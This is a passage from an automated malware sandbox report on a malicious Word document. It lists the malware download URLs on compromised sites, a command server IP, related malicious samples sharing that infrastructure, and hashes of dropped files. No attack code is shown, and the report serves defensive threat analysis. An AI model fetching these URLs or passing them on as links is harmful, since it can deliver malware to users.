                    http://khanhhoahomnay.net/wordpress/CGMC/100%Avira URL Cloudmalware
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/0%Avira URL Cloudsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://shop.elemenslide.com0%Avira URL Cloudsafe
                    http://khanhhoahomnay.net0%Avira URL Cloudsafe
                    http://shop.elemenslide.com/wp-content/n/100%Avira URL Cloudmalware
                    http://sofsuite.com0%Avira URL Cloudsafe
                    http://wpsapk.com0%Avira URL Cloudsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    http://wpsapk.com/wp-admin/v/0%Avira URL Cloudsafe
                    http://5.2.136.90/6tycsc/0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    veterinariadrpopui.com
                    		209.59.139.39
                    		truetrueunknown
                    wpsapk.com
                    		104.18.61.59
                    		truetrueunknown
                    sofsuite.com
                    		104.27.145.251
                    		truetrueunknown
                    khanhhoahomnay.net
                    		210.86.239.69
                    		truetrue
                      		unknown
                      shop.elemenslide.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://veterinariadrpopui.com/content/5f18Q/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://sofsuite.com/wp-includes/2jm3nIk/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://khanhhoahomnay.net/wordpress/CGMC/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://wpsapk.com/wp-admin/v/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://5.2.136.90/6tycsc/true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2112048540.0000000001E20000.00000002.00000001.sdmpfalse
                          		high
                          http://veterinariadrpopui.compowershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://investor.msn.comrundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpfalse
                              		high
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpfalse
                                		high
                                https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000005.00000002.2117636868.0000000003B18000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmpfalse
                                  		high
                                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2109113846.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113596822.0000000002B00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115556900.0000000002900000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmpfalse
                                        		high
                                        http://shop.elemenslide.compowershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://khanhhoahomnay.netpowershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://shop.elemenslide.com/wp-content/n/powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://investor.msn.com/rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpfalse
                                          		high
                                          http://sofsuite.compowershell.exe, 00000005.00000002.2117671209.0000000003B34000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://wpsapk.compowershell.exe, 00000005.00000002.2117636868.0000000003B18000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmpfalse
                                            		high
                                            http://www.%s.comPApowershell.exe, 00000005.00000002.2109113846.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113596822.0000000002B00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115556900.0000000002900000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		low

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.27.145.251
                                            		unknownUnited States
                                            		13335CLOUDFLARENETUStrue
                                            210.86.239.69
                                            		unknownViet Nam
                                            		24173NETNAM-AS-APNetnamCompanyVNtrue
                                            209.59.139.39
                                            		unknownUnited States
                                            		32244LIQUIDWEBUStrue
                                            104.18.61.59
                                            		unknownUnited States
                                            		13335CLOUDFLARENETUStrue
                                            5.2.136.90
                                            		unknownRomania
                                            		8708RCS-RDS73-75DrStaicoviciROtrue

                                            General Information

                                            Joe Sandbox Version:31.0.0 Red Diamond
                                            Analysis ID:336494
                                            Start date:06.01.2021
                                            Start time:08:44:11
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 33s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:DATA-480841.doc
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:17
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • GSI enabled (VBA)
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winDOC@26/8@7/5
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 91.5% (good quality ratio 88%)
                                            • Quality average: 75.5%
                                            • Quality standard deviation: 25.7%
                                            HCA Information:
                                            • Successful, ratio: 92%
                                            • Number of executed functions: 146
                                            • Number of non-executed functions: 90
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .doc
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Found warning dialog
                                            • Click Ok
                                            • Attach to Office via COM
                                            • Scroll down
                                            • Close Viewer
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            08:44:43API Interceptor1x Sleep call for process: msg.exe modified
                                            08:44:44API Interceptor57x Sleep call for process: powershell.exe modified
                                            08:44:50API Interceptor895x Sleep call for process: rundll32.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            104.27.145.251pack-91089 416755919.docGet hashmaliciousBrowse
                                            • sofsuite.com/wp-includes/2jm3nIk/
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • sofsuite.com/wp-includes/2jm3nIk/
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • sofsuite.com/wp-includes/2jm3nIk/
                                            210.86.239.69Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • khanhhoahomnay.net/wordpress/CGMC/
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • khanhhoahomnay.net/wordpress/CGMC/
                                            209.59.139.39Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            Adjunto.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            NQN0244_012021.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            Scan-0767672.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            info_39534.docGet hashmaliciousBrowse
                                            • veterinariadrpopui.com/content/5f18Q/
                                            http://btxtfnereq4mf3x3q1eq1sdudvhhiurr.www4.meGet hashmaliciousBrowse
                                            • cirugiaesteticamexico.medicainspira.com/wordpress/wp-content/upgrade/i/googlephotos/album/
                                            104.18.61.59Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • wpsapk.com/wp-admin/v/
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • wpsapk.com/wp-admin/v/
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • wpsapk.com/wp-admin/v/
                                            5.2.136.90Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/
                                            Adjunto.docGet hashmaliciousBrowse
                                            • 5.2.136.90/nmjn7tw17/z6mjkdfb6xb/85tf0qh6u/bqo6i0tmr9bo/
                                            arc-NZY886292.docGet hashmaliciousBrowse
                                            • 5.2.136.90/zpm1364ks766bq5tfgm/of4c87wiptl9gmt2iai/xi3tkrikfkjmyw07j7s/8758g9rolh/96kjwl7hgnpltacdm2/gdi8d56ispt49sa36ql/
                                            NQN0244_012021.docGet hashmaliciousBrowse
                                            • 5.2.136.90/xgyqftp8/ypox5kzx24gfln5utkh/ejrffzc54r5vq/itkmc/prx4/
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • 5.2.136.90/tqndp5p5qacps4njp6/p6z0bktcdw7ja/i1rph/
                                            Scan-0767672.docGet hashmaliciousBrowse
                                            • 5.2.136.90/7hs0yieqcvglex40v9/th111ygicc1htiecx/eto0vvprampeftpmcc/
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • 5.2.136.90/n5z35/rncfyghpt3nn9/twyyh8xn/dm5hb/
                                            informazioni-0501-012021.docGet hashmaliciousBrowse
                                            • 5.2.136.90/kcdo20u2bqptv6/
                                            rapport 40329241.docGet hashmaliciousBrowse
                                            • 5.2.136.90/6s0p53atjr9ihwygvd/svxo4o84aueyhj9v5m/5lqp30jb/g0ur1kwrzvgj3o0gmmo/dw8my2m1fzzo/
                                            info_39534.docGet hashmaliciousBrowse
                                            • 5.2.136.90/5ciqo/dhqbj3xw/
                                            Dati_012021_688_89301.docGet hashmaliciousBrowse
                                            • 5.2.136.90/l7tybna/g7nyjudv6/gf8bykzqxpzupj/wr2o0u8id88pf7dgmx3/9zupu1q7mb/wtjo6ov5niso7jo0n/
                                            2199212_20210105_160680.docGet hashmaliciousBrowse
                                            • 5.2.136.90/vcpu82n/rvhhoco3em4jtl/qxey084opeuhirghxzs/bm8x5w07go1ogzflbv/32imx8ryeb30/bd7tg46kn/
                                            ARCHIVO_FILE.docGet hashmaliciousBrowse
                                            • 5.2.136.90/ji02pdi/39rfb96opn/
                                            doc_X_13536.docGet hashmaliciousBrowse
                                            • 5.2.136.90/glhz448zi9act/ieva/q040/sl9198fns4q2/
                                            REP380501 040121.docGet hashmaliciousBrowse
                                            • 5.2.136.90/09hsu3aavqd4/8opns7c/oxp5fp7awb/
                                            doc-20210104-0184.docGet hashmaliciousBrowse
                                            • 5.2.136.90/78ro59myn48w9a6ku/bcgjwwwuc/
                                            7823099012021.docGet hashmaliciousBrowse
                                            • 5.2.136.90/bl7bvpp8itof0dvu5j2/nwcw9ztkp/yjrulniti57vcwwk67t/6u49kr6/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            wpsapk.comDocumenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            Adjunto.docGet hashmaliciousBrowse
                                            • 104.18.60.59
                                            NQN0244_012021.docGet hashmaliciousBrowse
                                            • 104.18.60.59
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            Scan-0767672.docGet hashmaliciousBrowse
                                            • 104.18.60.59
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • 172.67.141.14
                                            info_39534.docGet hashmaliciousBrowse
                                            • 172.67.141.14
                                            veterinariadrpopui.comDocumenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            Adjunto.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            NQN0244_012021.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            Scan-0767672.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            info_39534.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            sofsuite.comDocumenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 104.27.144.251
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 104.27.145.251
                                            Adjunto.docGet hashmaliciousBrowse
                                            • 104.27.144.251
                                            NQN0244_012021.docGet hashmaliciousBrowse
                                            • 104.27.144.251
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • 104.27.145.251
                                            Scan-0767672.docGet hashmaliciousBrowse
                                            • 104.27.144.251
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • 104.27.145.251
                                            info_39534.docGet hashmaliciousBrowse
                                            • 172.67.158.72
                                            khanhhoahomnay.netDocumenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 210.86.239.69
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 210.86.239.69

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            NETNAM-AS-APNetnamCompanyVNDocumenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 210.86.239.69
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 210.86.239.69
                                            LIQUIDWEBUSDocumenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            https://securemail.bridgepointeffect.com/Get hashmaliciousBrowse
                                            • 69.167.167.26
                                            Adjunto.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            NQN0244_012021.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            Scan-0767672.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            info_39534.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            https://encrypt.idnmazate.org/Get hashmaliciousBrowse
                                            • 67.225.177.41
                                            Nuevo pedido.exeGet hashmaliciousBrowse
                                            • 209.188.81.142
                                            https://6354mortgagestammp.com/Get hashmaliciousBrowse
                                            • 69.16.199.206
                                            rib.exeGet hashmaliciousBrowse
                                            • 72.52.175.20
                                            https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsecuremail.danchihosassociates.com&c=E,1,HOuENPlSucTdSUxKwjhrlo_5dPC7J6R1N-Gq03z50mu0n-SbGg9k6UcvRdnb2hWVC0JKp04hBPt2pBkJTi_IhWBa5JSs0U_QUfg3Hl_nTWTxJyTIR8N3&typo=1Get hashmaliciousBrowse
                                            • 67.225.158.30
                                            messaggio 2912.docGet hashmaliciousBrowse
                                            • 67.227.152.97
                                            8415051-122020.docGet hashmaliciousBrowse
                                            • 67.227.152.97
                                            Mensaje 900-777687.docGet hashmaliciousBrowse
                                            • 67.227.152.97
                                            088-29-122020-522-0590.docGet hashmaliciousBrowse
                                            • 67.227.152.97
                                            MENSAJE KCW_9805910.docGet hashmaliciousBrowse
                                            • 67.227.152.97
                                            https://image-grafix.com/0098/099/Get hashmaliciousBrowse
                                            • 72.52.133.164
                                            CLOUDFLARENETUSeTrader-0.1.0.exeGet hashmaliciousBrowse
                                            • 104.23.98.190
                                            Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            eTrader-0.1.0.exeGet hashmaliciousBrowse
                                            • 104.23.99.190
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            Payment Documents.xlsGet hashmaliciousBrowse
                                            • 104.22.1.232
                                            Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                                            • 104.22.1.232
                                            QPI-01458.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            LITmNphcCA.exeGet hashmaliciousBrowse
                                            • 104.28.5.151
                                            http://fake-cash-app-screenshot-generator.hostforjusteasy.funGet hashmaliciousBrowse
                                            • 172.67.179.45
                                            http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exeGet hashmaliciousBrowse
                                            • 104.16.203.237
                                            http://click.freshwaterlive.info/campaign/clicked/MjgzNjAxMzU%3D__MTAxOA%3D%3D__MjY3NzY5Ng%3D%3D__MjI2/aHR0cDovL2JpdC5seS8ySk1GMUJk?c=28360135Get hashmaliciousBrowse
                                            • 104.16.19.94
                                            https://awattorneys-my.sharepoint.com/:b:/p/fgalante/EcRfEpzLM_tOh_Roewbwm9oB4JarWh_30QaPZLGUdNbnuw?e=4%3aqmwocp&at=9Get hashmaliciousBrowse
                                            • 104.16.18.94
                                            http://reppoflag.net/2307e0382f77c950a2.jsGet hashmaliciousBrowse
                                            • 172.64.170.19
                                            https://firebasestorage.googleapis.com/v0/b/blckaxe.appspot.com/o/general%20page.html?alt=media&token=b4029a1b-78f5-43ff-a7eb-d4555ad6a60e#kymo@willowoodusa.comGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            http://hoquetradersltd.com/jordanbruce/index.phpGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                            • 104.18.70.113
                                            https://preview.hs-sites.com/_hcms/preview/template/multi?domain=undefined&hs_preview_key=SlyW7XnGAffndKslJ_Oq0Q&portalId=8990448&tc_deviceCategory=undefined&template_file_path=mutli/RFQ.htmlGet hashmaliciousBrowse
                                            • 104.16.115.104
                                            HSBC Payment Advice - HSBC67628473234[20201412].exeGet hashmaliciousBrowse
                                            • 172.67.156.125
                                            http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                            • 104.18.225.52
                                            https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                            • 104.18.70.113
                                            CLOUDFLARENETUSeTrader-0.1.0.exeGet hashmaliciousBrowse
                                            • 104.23.98.190
                                            Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            eTrader-0.1.0.exeGet hashmaliciousBrowse
                                            • 104.23.99.190
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            Payment Documents.xlsGet hashmaliciousBrowse
                                            • 104.22.1.232
                                            Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                                            • 104.22.1.232
                                            QPI-01458.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            LITmNphcCA.exeGet hashmaliciousBrowse
                                            • 104.28.5.151
                                            http://fake-cash-app-screenshot-generator.hostforjusteasy.funGet hashmaliciousBrowse
                                            • 172.67.179.45
                                            http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exeGet hashmaliciousBrowse
                                            • 104.16.203.237
                                            http://click.freshwaterlive.info/campaign/clicked/MjgzNjAxMzU%3D__MTAxOA%3D%3D__MjY3NzY5Ng%3D%3D__MjI2/aHR0cDovL2JpdC5seS8ySk1GMUJk?c=28360135Get hashmaliciousBrowse
                                            • 104.16.19.94
                                            https://awattorneys-my.sharepoint.com/:b:/p/fgalante/EcRfEpzLM_tOh_Roewbwm9oB4JarWh_30QaPZLGUdNbnuw?e=4%3aqmwocp&at=9Get hashmaliciousBrowse
                                            • 104.16.18.94
                                            http://reppoflag.net/2307e0382f77c950a2.jsGet hashmaliciousBrowse
                                            • 172.64.170.19
                                            https://firebasestorage.googleapis.com/v0/b/blckaxe.appspot.com/o/general%20page.html?alt=media&token=b4029a1b-78f5-43ff-a7eb-d4555ad6a60e#kymo@willowoodusa.comGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            http://hoquetradersltd.com/jordanbruce/index.phpGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                            • 104.18.70.113
                                            https://preview.hs-sites.com/_hcms/preview/template/multi?domain=undefined&hs_preview_key=SlyW7XnGAffndKslJ_Oq0Q&portalId=8990448&tc_deviceCategory=undefined&template_file_path=mutli/RFQ.htmlGet hashmaliciousBrowse
                                            • 104.16.115.104
                                            HSBC Payment Advice - HSBC67628473234[20201412].exeGet hashmaliciousBrowse
                                            • 172.67.156.125
                                            http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                            • 104.18.225.52
                                            https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                            • 104.18.70.113

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B01F17D-537D-406E-B057-1B1541B1D39D}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1024
                                            Entropy (8bit):0.05390218305374581
                                            Encrypted:false
                                            SSDEEP:3:ol3lYdn:4Wn
                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                            Malicious:false
                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):46
                                            Entropy (8bit):1.0424600748477153
                                            Encrypted:false
                                            SSDEEP:3:/lbWwWl:sZ
                                            MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                            SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                            SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                            SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                            Malicious:false
                                            Preview: ........................................user.
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DATA-480841.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 6 15:44:40 2021, length=169984, window=hide
                                            Category:dropped
                                            Size (bytes):2038
                                            Entropy (8bit):4.495422520712642
                                            Encrypted:false
                                            SSDEEP:24:8rk/XTm6GreV2UNeM0Dv3qcdM7dD2rk/XTm6GreV2UNeM0Dv3qcdM7dV:8rk/XTFGqMUN1cQh2rk/XTFGqMUN1cQ/
                                            MD5:0CDFA0D89B4174F43B7C98022E2F67A9
                                            SHA1:008543A332890FB46A197EA8B2A2BF9972D66097
                                            SHA-256:20B80A3021EC817285D5BF337B8F4A53C94B7E53F690B000FB63C41733F9F327
                                            SHA-512:7287791BE8D03043B880AA542ADF149D8CB4A773F384164D2C60DD64BC2D621B7ACA4641E63A36D9E364C62CA6551815939BFD4DFD44B6936E98CA368B2EDC32
                                            Malicious:false
                                            Preview: L..................F.... ...+....{..+....{..r.':K................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.....&R.. .DATA-4~1.DOC..L.......Q.y.Q.y*...8.....................D.A.T.A.-.4.8.0.8.4.1...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop\DATA-480841.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.A.T.A.-.4.8.0.8.4.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9F.C...........[D_....3N...W...9F
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):71
                                            Entropy (8bit):4.205347563368731
                                            Encrypted:false
                                            SSDEEP:3:M1yxkI0U5m0UmX1yxkI0Uv:Mwr0Gm0+r02
                                            MD5:393D2B811D2C21BEC5044DA35CB2B892
                                            SHA1:7034476F98514692497F81BA49080B25E16ADA4E
                                            SHA-256:A39A8F9194A9550DBB104AEF26FEAAA393BF5556B5858FA6F2BF94C70ADE2491
